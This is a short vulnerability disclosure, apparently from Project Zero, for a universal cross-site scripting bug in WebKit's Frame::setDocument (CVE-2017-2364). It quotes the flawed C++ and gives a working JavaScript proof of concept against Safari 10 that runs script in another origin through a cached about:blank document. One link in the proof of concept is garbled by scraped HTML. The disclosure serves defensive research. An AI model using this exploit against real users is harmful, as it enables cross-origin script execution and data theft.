Apple WebKit: UXSS via Frame::setDocument (1). 

CVE-2017-2364


void Frame::setDocument(RefPtr<Document>&& newDocument)
{
    ASSERT(!newDocument || newDocument->frame() == this);

    if (m_doc && m_doc->pageCacheState() != Document::InPageCache)
        m_doc->prepareForDestruction();

    m_doc = newDocument.copyRef();
    ...
}

The function |prepareForDestruction| only called when the cache state is not |Document::InPageCache|. So the frame will be never detached from the cached document.

PoC:

"use strict";

document.write("click anywhere to start");

window.onclick = () => {
    let w = open("about:blank", "one");
    let d = w.document;

    let a = d.createElement("a");
    a.href = "<a href="https://abc.xyz/";" title="" class="" rel="nofollow">https://abc.xyz/";</a>
    a.click();  <<------- about:blank -> Document::InPageCache

    let it = setInterval(() => {
        try {
            w.location.href.toString;
        } catch (e) {
            clearInterval(it);

            let s = d.createElement("a");  <<------ about:blank's document
            s.href = "javascript:alert(location)";
            s.click();
        }
    }, 0);
};


Tested on Safari 10.0.2(12602.3.12.0.1).


This bug is subject to a 90 day disclosure deadline. If 90 days elapse
without a broadly available patch, then the bug report will automatically
become visible to the public.




Found by: lokihardt